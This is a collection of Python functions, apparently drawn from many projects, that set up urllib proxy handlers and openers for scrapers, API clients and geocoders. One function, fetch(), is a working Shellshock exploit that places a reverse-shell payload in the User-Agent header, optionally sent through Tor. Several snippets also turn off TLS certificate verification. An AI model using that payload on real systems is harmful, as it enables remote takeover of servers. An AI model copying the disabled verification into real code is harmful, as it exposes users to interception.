def update_feed(self, feed):
    handlers = []
    if utils.web.proxy():
        handlers.append(ProxyHandler(
            {'http': utils.force(utils.web.proxy())}))
        handlers.append(ProxyHandler(
            {'https': utils.force(utils.web.proxy())}))
    with feed.lock:
        d = feedparser.parse(feed.url, etag=feed.etag,
                             modified=feed.modified, handlers=handlers)
        if 'status' not in d or d.status != 304:  # Not modified
            if 'etag' in d:
                feed.etag = d.etag
            if 'modified' in d:
                feed.modified = d.modified
            feed.data = d.feed
            feed.entries = d.entries
            feed.last_update = time.time()
            # feedparser will store soft errors in bozo_exception and set
            # the "bozo" bit to 1 on supported platforms:
            # https://pythonhosted.org/feedparser/bozo.html
            # If this error caused us to e.g. not get any entries at all,
            # it may be helpful to show it as well.
            if getattr(d, 'bozo', 0) and hasattr(d, 'bozo_exception'):
                feed.last_exception = d.bozo_exception
            else:
                feed.last_exception = None
        (initial, feed.initial) = (feed.initial, False)
        self.announce_feed(feed, initial)

def build_opener(self, debug=False):
    """Create handlers with the appropriate debug level.

    We intentionally create new ones because the OpenerDirector class in
    urllib2 is smart enough to replace its internal versions with ours if
    we pass them into the urllib2.build_opener method.  This is much
    easier than trying to introspect into the OpenerDirector to find the
    existing handlers.

    Based on http://code.activestate.com/recipes/440574/#c1

    TODO: Implement workaround for http://bugs.python.org/issue7152
    """
    http_handler = HTTPHandler(debuglevel=debug)
    https_handler = HTTPSHandler(debuglevel=debug)
    proxy_handler = ProxyHandler(debuglevel=debug)
    unknown_handler = UnknownHandler(debuglevel=debug)
    http_default_error_handler = HTTPDefaultErrorHandler(debuglevel=debug)
    http_redirect_handler = HTTPRedirectHandler(debuglevel=debug)
    http_error_processor = HTTPErrorProcessor(debuglevel=debug)

    handlers = [http_handler, https_handler, proxy_handler,
                unknown_handler, http_default_error_handler,
                http_redirect_handler, http_error_processor]
    # build_opener takes handlers as separate arguments, not as a single
    # list, so the list has to be unpacked.
    opener = build_opener(*handlers)
    return opener

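# --- Usage sketch (illustrative, not from the source above) ----------------
# The stdlib HTTP handlers already accept a debuglevel, so a minimal debug
# opener needs no custom subclasses; the recipe above subclasses the other
# handlers only to give them all the same constructor signature. Python 3
# names are used here.
from urllib.request import HTTPHandler, HTTPSHandler, build_opener

def make_debug_opener(debug=False):
    # debuglevel=1 makes http.client dump raw request/response headers
    level = 1 if debug else 0
    return build_opener(HTTPHandler(debuglevel=level),
                        HTTPSHandler(debuglevel=level))

# make_debug_opener(debug=True).open('http://example.com')
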
def __init__(self, format_string=DEFAULT_FORMAT_STRING,
             scheme=DEFAULT_SCHEME, timeout=DEFAULT_TIMEOUT,
             proxies=None):
    """
    Mostly-common geocoder validation, proxies, &c. Not all geocoders
    specify format_string and such.
    """
    self.format_string = format_string
    self.scheme = scheme
    if self.scheme not in ('http', 'https'):  # pragma: no cover
        raise ConfigurationError(
            'Supported schemes are `http` and `https`.')
    self.proxies = proxies
    self.timeout = timeout

    # Add urllib proxy support using environment variables or
    # built-in OS proxy details
    # See: http://docs.python.org/2/library/urllib2.html
    # And: http://stackoverflow.com/questions/1450132/proxy-with-urllib2
    if self.proxies is None:
        self.urlopen = urllib_urlopen
    else:
        # build_opener() returns an OpenerDirector, which is not callable;
        # bind its open() method so self.urlopen keeps the same call shape
        # as urlopen.
        self.urlopen = build_opener(ProxyHandler(self.proxies)).open

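# --- Illustration (hypothetical proxy values) -------------------------------
# The `proxies` mapping has the same scheme -> URL shape ProxyHandler
# expects, and binding .open is what keeps the result call-compatible
# with urlopen.
from urllib.request import ProxyHandler, build_opener

proxies = {'http': 'http://10.0.0.1:3128',    # assumed address
           'https': 'http://10.0.0.1:3128'}
urlopen_like = build_opener(ProxyHandler(proxies)).open
# urlopen_like('https://example.com', timeout=5)
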
def add_release(self, srr_file):
    """srr_file: the srr file to upload"""
    opener = register_openers()
    if _PROXY:
        opener.add_handler(ProxyHandler({_PROXY_TYPE: _PROXY_URL}))
    # Ensure file is Unicode:
    srr_file = srr_file.decode(sys.getfilesystemencoding())
    datagen, new_headers = multipart_encode({
        "MAX_FILE_SIZE": _MAX_FILE_SIZE,
        "file": open(srr_file, "rb"),
        "upload": "Upload",
    })
    headers = dict(self.headers)  # makes a copy of the original dict
    headers.update(new_headers)
    url = self.baseurl + "upload"
    request = Request(url, datagen, headers)
    opener.add_handler(HTTPCookieProcessor(self.cj))

    # Actually do the request, and get the response
    handle = urllib2.urlopen(request)
    html_source = handle.read()

    if len(re.findall(r".* was uploaded\.", html_source)):
        print("'%s' was added." % srr_file)
        return True
    elif len(re.findall(r".* is.*administrator.*", html_source)):
        print("!!! '%s' already exists." % srr_file)
    elif len(re.findall(r".*contains illegal characters.*", html_source)):
        print("!!! '%s' contains illegal characters." % srr_file)
    else:
        print(html_source)
    return False

def check_proxy(self, specific={}):
    """Checks if proxy settings are set in the OS.

    Returns:
    -- 1 when direct connection works fine
    -- 2 when direct connection fails and no proxy is set in the OS
    -- 3, plus the settings, when a proxy is set in the OS

    see: https://docs.python.org/2/library/urllib.html#urllib.getproxies
    """
    os_proxies = getproxies()
    if len(os_proxies) == 0 and self.check_internet_connection:
        logging.info("No proxy needed nor set. Direct connection works.")
        return 1
    elif len(os_proxies) == 0 and not self.check_internet_connection:
        logging.error("Proxy not set in the OS. Needs to be specified")
        return 2
    else:
        env['http_proxy'] = os_proxies.get("http")
        env['https_proxy'] = os_proxies.get("https")

        proxy = ProxyHandler({
            'http': os_proxies.get("http"),
            'https': os_proxies.get("https")
        })
        opener = build_opener(proxy)
        install_opener(opener)
        urlopen('http://www.google.com')
        return 3, os_proxies

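# --- Standalone sketch of the getproxies() probe used above -----------------
# getproxies() merges scheme -> URL mappings from the http_proxy/https_proxy
# environment variables and OS-level settings; an empty dict means no proxy
# is configured (the "return 2" branch above).
from urllib.request import getproxies

def describe_os_proxies():
    os_proxies = getproxies()
    if not os_proxies:
        return "no OS-level proxy configured"
    return "OS proxies: %r" % (os_proxies,)

# print(describe_os_proxies())
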
def getLinks(pageUrl, recursionLevel):
    global pages
    if recursionLevel > 4:
        return
    pageId = insertPageIfNotExists(pageUrl)
    url = "http://en.wikipedia.org" + pageUrl
    proxy_handler = ProxyHandler({'http': '114.113.126.86:80'})
    opener = build_opener(proxy_handler)
    install_opener(opener)
    user_agent = ('Mozilla/5.0 (Windows NT 6.2; WOW64; rv:22.0) '
                  'Gecko/20100101 Firefox/22.0')
    values = {
        'name': 'Michael Foord',
        'location': 'Northampton',
        'language': 'Python'
    }
    headers = {'User-Agent': user_agent}
    data = urllib.urlencode(values)
    request = Request(url, data, headers)
    html = urlopen(request)
    bsObj = BeautifulSoup(html)
    for link in bsObj.findAll("a", href=re.compile("^(/wiki/)((?!:).)*$")):
        insertLink(pageId, insertPageIfNotExists(link.attrs['href']))
        if link.attrs['href'] not in pages:
            newPage = link.attrs['href']
            pages.add(newPage)
            getLinks(newPage, recursionLevel + 1)

def fetchLayerInfo(cls, url, ver=None, proxy=None):
    '''Non-GDAL static method for fetching LDS layer ID's using etree parser.'''
    res = []
    content = None
    wfs_ns = cls.NS['wfs20'] if re.match('^2', ver) else cls.NS['wfs11']
    ftxp = "//{0}FeatureType".format(wfs_ns)
    nmxp = "./{0}Name".format(wfs_ns)
    ttxp = "./{0}Title".format(wfs_ns)
    kyxp = "./{0}Keywords/{0}Keyword".format(cls.NS['ows'])

    try:
        if not LDSUtilities.assessNone(proxy):
            install_opener(build_opener(ProxyHandler(proxy)))
        #content = urlopen(url)#bug in lxml doesnt close url/files using parse method
        with closing(urlopen(url)) as content:
            tree = etree.parse(content)
            for ft in tree.findall(ftxp):
                name = ft.find(nmxp).text  #.encode('utf8')
                title = ft.find(ttxp).text  #.encode('utf8')
                #keys = [x.text.encode('utf8') for x in ft.findall(kyxp)]
                keys = [x.text for x in ft.findall(kyxp)]

                res += ((name, title, keys),)
    except XMLSyntaxError as xe:
        ldslog.error('Error parsing URL;' + str(url) + ' ERR;' + str(xe))

    return res

def download(self, url, user_agent, proxy, num_retries, data=None):
    print('Downloading:', url)
    # header key fixed: 'User_agent' (with an underscore) would not be
    # recognised as the User-Agent header by servers
    headers = {'User-agent': user_agent}
    request = Request(url, headers=headers)
    opener = self.opener or build_opener()
    if proxy:
        proxy_params = {urlparse(url).scheme: proxy}
        opener.add_handler(ProxyHandler(proxy_params))
    try:
        response = opener.open(request)
        html = response.read()
        code = response.code
    except Exception as e:
        print('Download error:', str(e))
        html = None
        if hasattr(e, 'code'):
            code = e.code
            # retry 5xx server errors
            if num_retries > 0 and 500 <= code < 600:
                # bound method: self must not be passed explicitly
                return self.download(url, user_agent, proxy,
                                     num_retries - 1)
        else:
            code = None
    return {'html': html, 'code': code}

def get(self, url):
    """
    Internal API for GET request on an OTX URL
    :param url: URL to retrieve
    :return: response in JSON object form
    """
    if self.proxy:
        proxy = ProxyHandler({'http': self.proxy})
        request = build_opener(proxy)
    else:
        request = build_opener()
    request.addheaders = [('X-OTX-API-KEY', self.key),
                          ('User-Agent', self.sdk)]
    response = None
    try:
        response = request.open(url)
    except URLError as e:
        if isinstance(e, HTTPError):
            if e.code == 403:
                raise InvalidAPIKey("Invalid API Key")
            elif e.code == 400:
                raise BadRequest("Bad Request")
        else:
            raise e
    data = response.read().decode('utf-8')
    json_data = json.loads(data)
    return json_data

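# --- Minimal sketch of the opener-wide header pattern above -----------------
# (key and agent strings are placeholders, not real credentials)
from urllib.request import build_opener

opener = build_opener()
opener.addheaders = [('X-OTX-API-KEY', 'YOUR-KEY-HERE'),
                     ('User-Agent', 'example-sdk/1.0')]
# every opener.open(...) call now carries both headers
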
def build_opener(source_address=None, timeout=10):
    """Function similar to ``urllib2.build_opener`` that will build
    an ``OpenerDirector`` with the explicit handlers we want,
    ``source_address`` for binding, ``timeout`` and our custom
    `User-Agent`
    """

    # printer('Timeout set to %d' % timeout, debug=True)

    if source_address:
        source_address_tuple = (source_address, 0)
        # printer('Binding to source address: %r' % (source_address_tuple,),
        #         debug=True)
    else:
        source_address_tuple = None

    handlers = [
        ProxyHandler(),
        SpeedtestHTTPHandler(source_address=source_address_tuple,
                             timeout=timeout),
        SpeedtestHTTPSHandler(source_address=source_address_tuple,
                              timeout=timeout),
        HTTPDefaultErrorHandler(),
        HTTPRedirectHandler(),
        HTTPErrorProcessor()
    ]

    opener = OpenerDirector()
    opener.addheaders = [('User-agent', build_user_agent())]

    for handler in handlers:
        opener.add_handler(handler)

    return opener

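# --- Sketch of the same manual OpenerDirector assembly with stock handlers --
# The Speedtest* subclasses above only add source-address binding and a
# per-connection timeout; with plain stdlib handlers the pattern looks like:
from urllib.request import (OpenerDirector, ProxyHandler, HTTPHandler,
                            HTTPSHandler, HTTPDefaultErrorHandler,
                            HTTPRedirectHandler, HTTPErrorProcessor)

opener = OpenerDirector()
opener.addheaders = [('User-agent', 'example-agent/1.0')]  # assumed UA
for handler in (ProxyHandler(), HTTPHandler(), HTTPSHandler(),
                HTTPDefaultErrorHandler(), HTTPRedirectHandler(),
                HTTPErrorProcessor()):
    opener.add_handler(handler)
# opener.open('http://example.com')
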
def __init__(self, source_registry, time_update_at, delay, registry_delay,
             services_not_available, source_registry_proxy=None):
    super(Registry, self).__init__(services_not_available)
    self.start_time = get_now()
    self.INFINITY_LOOP = True
    self.DATA_PATH = DATA_PATH
    self.registry_xml = os.path.join(self.DATA_PATH, 'registry.xml')
    self.source_registry = source_registry
    self.source_registry_proxy = source_registry_proxy
    if type(time_update_at).__name__ == 'str':
        self.time_update_at = string_time_to_datetime(
            time_update_at or '05:30:00')
    else:
        self.time_update_at = time_update_at
    self.delay = delay
    self.registry_delay = registry_delay
    if source_registry_proxy:
        proxy = ProxyHandler({
            'http': source_registry_proxy,
            'https': source_registry_proxy
        })
        self.urlopen = build_opener(proxy).open
    else:
        self.urlopen = urlopen

def fetch(url, ip, port, timeout=3, verbos=False, method='get',
          debugLevel=0, proxy=False, tor=False):
    payload = "() { ignored;};/bin/bash -i >& /dev/tcp/%s/%s 0>&1" % (ip, port)
    try:
        proxy_support = ProxyHandler({'http': proxy} if proxy else {})
        opener = build_opener(proxy_support,
                              HTTPHandler(debuglevel=debugLevel))
        opener = build_opener(
            # HTTPHandler(debuglevel=level),
            SocksiPyHandler(PROXY_TYPE_SOCKS5, '127.0.0.1', 9050),
        ) if tor else opener
        # exit(opener.open('http://ifconfig.me/ip').read().strip())

        # Spoof the user-agent
        opener.addheaders = [('User-agent', payload)]
        install_opener(opener)
        # url = 'http://%s' % url if not url.startswith('http://') else url
        opener.open(url, timeout=timeout)
        # src = src.read()
        # return src
    except socket.timeout:
        if verbos:
            print "[!] Connection lost to host: %s" % url
        exit(1)

def run_query(query_string, output='json', update=False):
    # use null ProxyHandler to ignore proxy for localhost access
    proxy_support = ProxyHandler({})
    opener = build_opener(proxy_support)
    install_opener(opener)
    pre = prefixes.Prefixes()
    if update:
        action = 'update'
        qstr = urlencode([(action, "%s %s" % (pre.sparql, query_string))])
    else:
        action = 'query'
        qstr = urlencode([(action, "%s %s" % (pre.sparql, query_string)),
                          ("output", output),
                          ("stylesheet", "/static/xml-to-html-links.xsl")])
    BASEURL = "http://127.0.0.1:3131/metocean/%s?" % action
    data = ''
    try:
        data = opener.open(Request(BASEURL), qstr).read()
    except URLError:
        raise Exception("Unable to contact Fuseki server on %s" % BASEURL)
    if output == "json":
        return process_data(data)
    elif output == "text":
        return data
    else:
        return data

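# --- Why ProxyHandler({}) and not ProxyHandler() -----------------------------
# An explicit empty mapping overrides any http_proxy/https_proxy environment
# variables, so requests to the localhost Fuseki endpoint above always go
# direct; a bare ProxyHandler() would pick the environment proxies up.
from urllib.request import ProxyHandler, build_opener, install_opener

install_opener(build_opener(ProxyHandler({})))  # all urlopen calls go direct
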
def install_proxy(self):
    """set proxy if one is set in QGIS network settings"""

    # initially support HTTP for now
    if self.settings.value('/proxy/proxyEnabled') == 'true':
        if self.settings.value('/proxy/proxyType') == 'HttpProxy':
            ptype = 'http'
        else:
            return

        user = self.settings.value('/proxy/proxyUser')
        password = self.settings.value('/proxy/proxyPassword')
        host = self.settings.value('/proxy/proxyHost')
        port = self.settings.value('/proxy/proxyPort')

        proxy_up = ''
        proxy_port = ''

        if all([user != '', password != '']):
            proxy_up = '%s:%s@' % (user, password)

        if port != '':
            proxy_port = ':%s' % port

        conn = '%s://%s%s%s' % (ptype, proxy_up, host, proxy_port)
        install_opener(build_opener(ProxyHandler({ptype: conn})))

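# --- Shape of the proxy URL assembled above (all values assumed) ------------
conn = '%s://%s%s%s' % ('http', 'alice:secret@', 'proxy.example.com', ':3128')
assert conn == 'http://alice:secret@proxy.example.com:3128'
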
def __init__(self, language='english', user_agent=USER_AGENT, proxy=None):
    self.set_language(language)
    self.user_agent = user_agent
    if proxy is not None:
        proxy_support = ProxyHandler({'http': proxy, 'https': proxy})
        opener = build_opener(proxy_support)
        install_opener(opener)

def readLDS(up, q):
    '''Simple LDS reader to be used in a timed worker thread context'''
    (u, p) = up
    ldslog.debug("LDS URL {} using Proxy {}".format(u, p))
    if LDSUtilities.isProxyValid(p):
        install_opener(build_opener(ProxyHandler(p)))
    with closing(urlopen(u)) as lds:
        q.put(lds.read())

def http_request(url, method="GET"): proxy_handler = ProxyHandler({}) opener = build_opener(proxy_handler) try: req = opener.open(url, timeout=30) return req except Exception as e: #logging.exception("web_control http_request:%s fail:%s", url, e) return False
def __fetchResolutionFromJira__(self):
    global JIRA_URL
    bug = "%s-%d" % (self._bugType, self._number)
    if bug in self._fetchResults_:
        result = self._fetchResults_[bug]
        self._resolution = result[0]
        self._fix = result[1]
        return
    data = None
    proxy = os.getenv("SYSTEST_PROXY", None)
    try:
        if proxy:
            proxy = ProxyHandler({'https': proxy})
            opener = build_opener(proxy)
            install_opener(opener)
        bugReport = urlopen('%s/%s' % (JIRA_URL, bug))
        data = bugReport.read()
    except:
        data = self.__tryExternalTools__(proxy)
        if data is None:
            test.warning(
                "Sorry, ssl module missing - cannot fetch data via HTTPS",
                "Try to install the ssl module by yourself, or set the python "
                "path inside SQUISHDIR/etc/paths.ini to use a python version with "
                "ssl support OR install wget or curl to get rid of this warning!")
    if data is None:
        test.fatal("No resolution info for %s" % bug)
        self._resolution = 'Done'
    else:
        if isinstance(data, bytes):
            data = str(data)
        data = data.replace("\r", "").replace("\n", "")
        # raw strings: '\s' in a plain literal is an invalid escape sequence
        resPattern = re.compile(
            r'<span\s+id="resolution-val".*?>(?P<resolution>.*?)</span>')
        resolution = resPattern.search(data)
        fixVersion = 'None'
        fixPattern = re.compile(r'<span.*?id="fixfor-val".*?>(?P<fix>.*?)</span>')
        fix = fixPattern.search(data)
        titlePattern = re.compile(r'title="(?P<title>.*?)"')
        if fix:
            fix = titlePattern.search(fix.group('fix').strip())
            if fix:
                fixVersion = fix.group('title').strip()
        self._fix = fixVersion
        if resolution:
            self._resolution = resolution.group("resolution").strip()
        else:
            test.fatal("FATAL: Cannot get resolution of bugreport %s" % bug,
                       "Looks like JIRA has changed.... Please verify!")
            self._resolution = None
        if self._resolution is None:
            self.__cropAndLog__(data)
    self._fetchResults_.update({bug: [self._resolution, self._fix]})

def get_opener(handlers=[], headers={}, proxies={}):
    """Get HTTP URL opener and call its `open()` method to open an URL.

    Arguments:
    - `handlers`: list, handlers support cookie, authority, and other
        advanced HTTP features.
    - `headers`: dictionary, treated as if add_header() was called with
        each key and value as arguments, often used to "spoof" the
        `User-Agent` header or `Referer` header, etc.
    - `proxies`: dictionary, URL of the proxy, e.g.
        {'http': 'http://<host>:<port>'},
        if your proxy requires authentication:
        {'http': 'http://<user>:<password>@<host>:<port>'}
    """
    _handlers = []
    _handlers.extend(handlers)

    # proxy handler
    http_proxy = proxies or \
        settings.get('allow_proxy') and settings.get('proxies', None)
    if http_proxy:
        try:
            _handlers.append(ProxyHandler(http_proxy))
        except Exception as e:
            print("\n==> Warning: proxy invalid, please check.")
            print(e)

    # gzip/deflate/bzip2 compression handler
    if settings.get('accept_gzip'):
        encoding_handler = utils.ContentEncodingProcessor()
        _handlers.append(encoding_handler)

    # redirect handler
    _handlers.append(utils.HTTPRedirectHandler)

    opener = build_opener(*_handlers)

    # Add HTTP Request Headers
    # default HTTP Headers in configures
    _headers = settings.get('default_headers')
    # dictionary of HTTP Headers to attach
    _headers.update(headers)

    # remove if we have a value in default headers
    if _headers:
        normal_keys = [k.capitalize() for k in _headers]
        for key, val in opener.addheaders[:]:
            # default key, value: 'User-agent', 'Python-urllib/2.7'
            # see python doc
            if key not in normal_keys:  # list search
                continue
            opener.addheaders.remove((key, val))

    # Extend `addheaders` of the opener, dict to tuple list
    opener.addheaders.extend(_headers.items())

    return opener

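# --- Standalone sketch of the User-Agent de-duplication above ---------------
# build_opener() seeds addheaders with ('User-agent', 'Python-urllib/X.Y');
# dropping matching keys first ensures only the custom value is sent.
# Header values here are placeholders.
from urllib.request import build_opener

opener = build_opener()
custom = {'User-Agent': 'Mozilla/5.0 (example)', 'Referer': 'http://example.com'}
normal_keys = [k.capitalize() for k in custom]  # 'User-Agent' -> 'User-agent'
opener.addheaders = [(k, v) for k, v in opener.addheaders
                     if k not in normal_keys]
opener.addheaders.extend(custom.items())
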
def u2handlers(self):
    handlers = []
    handlers.append(ProxyHandler(self.proxy))
    handlers.append(HTTPBasicAuthHandler(self.pm))
    # python ssl Context support - PEP 0466
    if hasattr(ssl, '_create_unverified_context'):
        ssl_context = ssl._create_unverified_context()
        handlers.append(HTTPSHandler(context=ssl_context))
    else:
        handlers.append(HTTPSHandler())
    return handlers

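# --- Caveat sketch: verified HTTPS instead of the unverified context --------
# ssl._create_unverified_context() disables certificate checks entirely;
# unless broken or self-signed certificates are expected, a default context
# keeps verification on with the same handler wiring.
import ssl
from urllib.request import HTTPSHandler, build_opener

opener = build_opener(HTTPSHandler(context=ssl.create_default_context()))
# opener.open('https://example.com')
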
def __init__(self, format_string=None, proxies=None):
    self.format_string = format_string or '%s'
    self.proxies = proxies

    # Add urllib proxy support using environment variables or
    # built-in OS proxy details
    # See: http://docs.python.org/2/library/urllib2.html
    # And: http://stackoverflow.com/questions/1450132/proxy-with-urllib2
    if self.proxies is None:
        self.urlopen = urllib_urlopen
    else:
        # bind open() so self.urlopen stays callable like urlopen;
        # an OpenerDirector instance itself is not callable
        self.urlopen = build_opener(ProxyHandler(self.proxies)).open

def get_full_data():
    try:
        if "https_proxy" in environ:
            proxy = ProxyHandler({"https": environ.get("https_proxy")})
            opener = build_opener(proxy)
            install_opener(opener)
        datajson = urlopen(req).read()
        return loads(datajson)
    except Exception as e:
        print '[' + str(datetime.now()) + '] - ' + str(e)
        return 0

def Checkout_ip(ip):
    socket.setdefaulttimeout(1)
    # test the candidate address passed in (the original referenced a
    # global `proxy` instead of the `ip` argument)
    proxy_handler = ProxyHandler({'http': ip})
    opener = build_opener(proxy_handler)
    install_opener(opener)
    tag = False  # initialised so the return never hits an unbound name
    try:
        html = urlopen('http://baidu.com')
        if html:
            tag = True
    except Exception:
        tag = False
        ip = None
    return tag, ip

def sendRequest(text, lang='en-ru'):
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    proxy = ProxyHandler({'https': '199.201.121.139:3128'})
    try:
        opener = build_opener(proxy)
        opener.add_handler(HTTPSHandler(context=ctx))
        req = Request(url_request.format(text=text.encode('utf-8'), lang=lang))
        req.get_method = lambda: 'POST'
        response = json.loads(opener.open(req).read().decode('utf-8'))
    except:
        response = ''
    return response

def parse(self, url, proxy=None):
    # FIXME: useless for the concurrent processing
    if proxy:
        proxy_handler = ProxyHandler({'http': proxy})
        g.opener = build_opener(proxy_handler)

    result = {}
    try:
        video_id = REGEX_YOUTUBE_VIDEO_ID.search(url)
        video = pafy.new(
            self.decorate(video_id.group("video_id")))
    except IOError, exc:
        raise ValueError(unicode(exc))

def __init__(self, server, port, username, password, verbose=False):
    self.server = server
    self.port = port
    self.username = username
    self.password = password
    self.base_url = 'https://%s:%s' % (self.server, self.port)
    self.verbose = verbose
    self.launched_scans = {}

    # Force urllib2 to not use a proxy
    hand = ProxyHandler({})
    opener = build_opener(hand)
    install_opener(opener)

    self.login()

def ValifyProxy(protocol='http', ip='', port=0):
    from urllib2 import ProxyHandler
    import urllib2
    import fakerhelper

    proxyheader = ProxyHandler({protocol: "%s:%s" % (ip, port)})
    proxyopener = urllib2.build_opener(proxyheader)
    # attach the fake headers to the opener itself; the original routed them
    # through an unused BaseHandler, which never applied them
    # (assumes GetFakerHeader() returns a list of (name, value) pairs)
    proxyopener.addheaders = fakerhelper.GetFakerHeader()
    try:
        testresponse = proxyopener.open("http://www.baidu.com", timeout=10)
    except:
        print "wrong proxy ip", ip
    else:
        print "correct proxy ip", ip, ":", port
        with open(proxiesfile, 'ab') as f:
            f.write("%s::%s\n" % (ip, port))

def main():
    """Start application"""
    formatter = logging.Formatter(
        "%(asctime)s [%(name)s:%(levelname)s] %(message)s")
    loghandle = logging.StreamHandler()
    loghandle.setFormatter(formatter)
    logger.addHandler(loghandle)

    args = get_args()

    if args.debug:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.INFO)

    if os.name != 'nt':
        if 'http_proxy' not in os.environ or 'https_proxy' not in os.environ:
            logger.warning("Note: http_proxy and/or https_proxy "
                           "environment variables not set")

    logger.info("Python v{maj}: {exe}".format(maj=PYMAJ, exe=sys.executable))

    proxy = ProxyHandler()
    install_opener(build_opener(proxy))
    _check_urls()

    archive, url = DJANGO[args.django]
    if not args.offline:
        try:
            download(url, archive)
        except (URLError, HTTPError, TypeError) as err:
            logger.error("Error downloading Django {name}: {error}".format(
                name=args.django, error=err.reason))
            sys.exit(1)

    myconnpy_install = os.path.join(os.getcwd(), 'test_install')
    _install_connector(myconnpy_install)

    django_tests(
        args.django, archive,
        myconnpy=myconnpy_install,
        tests=args.tests,
        group=args.group,
    )

def get(self, save_to_file_path=None):
    """
    Getting browscap file contents and saving it to a file or returning
    it as a string.

    Returns file contents as a string if save_to_file_path is None,
    otherwise saves the contents to that path and returns None.

    :param save_to_file_path: path on filesystem where browscap file will be saved
    :type save_to_file_path: string
    :returns: None or browscap file contents
    :rtype: string
    :raises: ValueError, urllib2.URLError, urllib2.HTTPError
    """
    try:
        log.info('Downloading latest version of browscap file from %s',
                 self.url)
        opener = build_opener()
        if self.proxy is not None:
            log.info('Setting up proxy server %s' % self.proxy)
            opener.add_handler(ProxyHandler({'http': self.proxy}))
        if self.additional_handlers is not None:
            for handler in self.additional_handlers:
                opener.add_handler(handler)
        opener.addheaders = [('User-agent', 'pybrowscap downloader')]
        install_opener(opener)
        response = opener.open(self.url, timeout=self.timeout)
        contents = response.read()
        response.close()
    except ValueError:
        log.exception('Url to browscap file is probably invalid')
        raise
    # HTTPError subclasses URLError, so it has to be caught first or its
    # clause is never reached
    except HTTPError:
        log.exception('Something went wrong while downloading browscap file')
        raise
    except URLError:
        log.exception('Something went wrong while processing urllib2 handlers')
        raise

    if save_to_file_path is not None:
        try:
            log.info('Saving latest version of browscap file to %s',
                     save_to_file_path)
            with open(save_to_file_path, 'wb') as fp:
                fp.write(contents)
        except IOError:
            log.exception('Error while saving latest version of browscap file')
            raise
    else:
        return contents

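# --- Standalone sketch of the except-ordering rule applied above ------------
# HTTPError subclasses URLError: catching URLError first would swallow HTTP
# status errors and leave the HTTPError clause unreachable.
from urllib.error import HTTPError, URLError
from urllib.request import urlopen

def fetch(url):
    try:
        return urlopen(url, timeout=10).read()
    except HTTPError:   # specific: server answered with an error status
        raise
    except URLError:    # general: DNS or connection-level failure
        raise
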